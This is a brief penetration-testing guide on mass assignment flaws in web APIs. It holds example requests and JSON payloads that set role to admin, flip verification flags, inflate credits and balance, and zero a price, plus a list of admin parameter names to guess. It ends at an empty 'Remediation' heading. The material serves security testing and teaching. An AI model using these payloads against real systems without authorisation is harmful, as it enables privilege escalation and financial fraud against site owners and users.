Mass Assignment Testing

Mass assignment (also known as Auto-Binding) occurs when an API endpoint automatically binds client input to internal object properties without filtering. This allows attackers to modify properties they shouldn't have access to, such as `isAdmin`, `balance`, or `role`.

Testing Techniques

The goal is to identify hidden fields and try to modify them.

1. Observe API Response

Look for fields in the response that are not present in the request documentation, such as role, isVerified, or credits.

Request:

GET /api/users/1001

Response:

{
  "id": 1001,
  "name": "John",
  "email": "john@example.com",
  "role": "user",
  "isVerified": true,
  "credits": 100,
  "internalId": "abc123"
}

2. Attempt Modification

Try to include these fields in a PUT or POST request with elevated values.

PUT /api/users/1001
Content-Type: application/json

{
  "name": "John",
  "role": "admin",
  "isVerified": true,
  "credits": 99999
}

3. Common Parameters

Even if you don't see them in the response, try guessing common administrative parameter names.

{
  "role": "admin",
  "isAdmin": true,
  "admin": true,
  "is_admin": true,
  "user_type": "admin",
  "userType": "admin",
  "privilege": "admin",
  "permissions": ["admin"],
  "access": "full",
  "verified": true,
  "email_verified": true,
  "active": true,
  "approved": true,
  "credits": 99999,
  "balance": 99999,
  "discount": 100,
  "price": 0
}

4. Registration Testing

Registration endpoints are often vulnerable to mass assignment.

POST /api/register
Content-Type: application/json

{
  "username": "attacker",
  "password": "password123",
  "email": "attacker@evil.com",
  "role": "admin"
}

5. Nested Objects

Don't forget to test nested objects.

{
  "user": {
    "role": "admin"
  },
  "profile": {
    "isAdmin": true
  }
}

Remediation